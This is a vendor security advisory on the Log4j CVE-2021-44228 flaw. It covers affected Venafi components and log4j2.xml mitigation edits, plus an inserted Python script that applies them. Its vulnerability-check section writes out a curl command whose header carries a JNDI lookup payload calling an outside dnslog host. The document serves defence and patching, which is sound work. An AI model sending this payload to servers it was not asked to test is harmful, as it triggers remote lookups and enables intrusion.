
Log4j CVE-2021-44228 Zero-Day Vulnerability notice

Applies to:

No primary Venafi products are affected.

The UniCERT CA service that ships with Trust Protection Platform does, however, use Log4j 2.14.0 and is vulnerable, though difficult to exploit. If you use that additional Certificate Authority service, follow the steps in the Resolution section. If you do not use the UniCERT CA service, no additional remediation is necessary.

Resolution:

VaaS was impacted at the time of disclosure, but has since been patched. No action is needed on the part of customers to patch VaaS. The version of Log4j used by VaaS has been updated to 2.16, and other mitigations have also been put in place.

If you are not sure whether you are using the UniCERT CA Service, look for an installed program called "Venafi UniCERT 5.3 Service" in your Add/Remove Programs list. If you do not have this service installed, you need not go any further: your installation is not impacted.

To mitigate the Log4j vulnerability in the UniCERT CA service, update the log4j2.xml file located at \Venafi\Utilities\UpiProxy\log4j2.xml, replacing:

<pattern>[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n</pattern>

with:

<pattern>[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg{nolookups}%n</pattern>

And also replace:

<PatternLayout pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n" />

with:

<PatternLayout pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg{nolookups}%n" />

Again, if you do not make use of the UniCERT CA service, which has a separate .msi installer, these steps are not necessary.
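As an added example (not Venafi's code), the script below applies the Resolution steps mechanically: it finds every Log4j 2 message converter (%m, %msg or %message) in the <pattern> elements and pattern="..." attributes of a log4j2.xml and inserts {nolookups}, leaving converters that already carry it untouched and reporting each change. The embedded SAMPLE is constructed to mirror the two lines quoted above; the file path on the command line is whatever you supply.

```python
import re
import sys

# Log4j 2 message converter (%m, %msg or %message) plus any existing {option}
# groups; the lookahead keeps %marker, %mdc, %map and similar converters out.
MSG_CONVERTER = re.compile(r"%(?:message|msg|m)(?![A-Za-z])(?P<opts>(?:\{[^}]*\})*)")

# Pattern strings live in a <pattern> element or in a pattern="..." attribute.
PATTERN_SITES = re.compile(
    r'(?P<elem><pattern>)(?P<elem_body>.*?)(?=</pattern>)'
    r'|(?P<attr>\bpattern=")(?P<attr_body>[^"]*)(?=")',
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample mirroring the two lines quoted in the Resolution section.
SAMPLE = """<Configuration><Appenders>
  <Console name="Console">
    <PatternLayout pattern="[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n" />
  </Console>
  <File name="File" fileName="upiproxy.log"><PatternLayout>
    <pattern>[%-5level] %d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %c{1} - %msg%n</pattern>
  </PatternLayout></File>
</Appenders></Configuration>
"""
def harden_pattern(pattern: str) -> str:
    """Insert {nolookups} after every message converter that lacks it."""
    def fix(m):
        opts = m.group("opts")
        if "nolookups" in opts.lower():
            return m.group(0)  # already mitigated, leave untouched
        name = m.group(0)[: len(m.group(0)) - len(opts)]
        return f"{name}{{nolookups}}{opts}"  # %m{ansi} -> %m{nolookups}{ansi}
    return MSG_CONVERTER.sub(fix, pattern)

def harden_log4j2_xml(xml_text: str):
    """Return (hardened_text, [(old_pattern, new_pattern), ...])."""
    changes = []
    def fix_site(m):
        prefix = m.group("elem") or m.group("attr")
        body = m.group("elem_body") if m.group("elem") else m.group("attr_body")
        new_body = harden_pattern(body)
        if new_body != body:
            changes.append((body, new_body))
        return prefix + new_body
    return PATTERN_SITES.sub(fix_site, xml_text), changes

if __name__ == "__main__":  # python harden_log4j2.py \Venafi\Utilities\UpiProxy\log4j2.xml
    hardened, changes = harden_log4j2_xml(open(sys.argv[1], encoding="utf-8").read())
    print("\n".join(f"- {o}\n+ {n}" for o, n in changes) or "nothing to change", file=sys.stderr)
    sys.stdout.write(hardened)  # redirect to a new file, review, then replace the original
```

Running it a second time over the hardened file reports nothing to change, which is a quick way to confirm every pattern now carries {nolookups}.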

Summary:

On December 10th 2021, a zero-day vulnerability in the Apache Log4j tool was revealed to the public at large. This vulnerability has been published as CVE-2021-44228.

Just as any company using Apache Log4j was likely to be vulnerable, Venafi's Venafi As A Service (VaaS) cloud product was vulnerable at the time of disclosure, and remediation began immediately. Remediation was concluded the same day, and VaaS is no longer vulnerable to this CVE.

The optional UniCERT CA service that can be installed alongside TPP also uses the vulnerable Log4j version. You can mitigate this vulnerability yourself by following the instructions above, and a patch for the UniCERT msi is forthcoming. The vast majority of Venafi customers do not use this optional add-on, but if you are uncertain, the instructions above explain how to find out whether this optional service is installed. The UniCERT CA service cannot be installed as part of a normal TPP installation procedure; it is a separate installation that must be invoked on its own.

More Info:

If you are interested in how to detect whether an application is affected by this vulnerability in general, see the following information.

Affected Version:

2.0 <= Apache Log4j <= 2.14.1

Sample check to determine whether your server is vulnerable:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'

Refreshing the DNS log page will show the DNS queries, which identify hosts that have triggered the vulnerability.

Temporary remediation:

  • Modify every logging pattern layout to use %m{nolookups} instead of %m in your logging configuration files (see details at https://issues.apache.org/jira/browse/LOG4J2-2109), or

  • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, so that your class loader uses your replacement instead of the vulnerable version of the class.
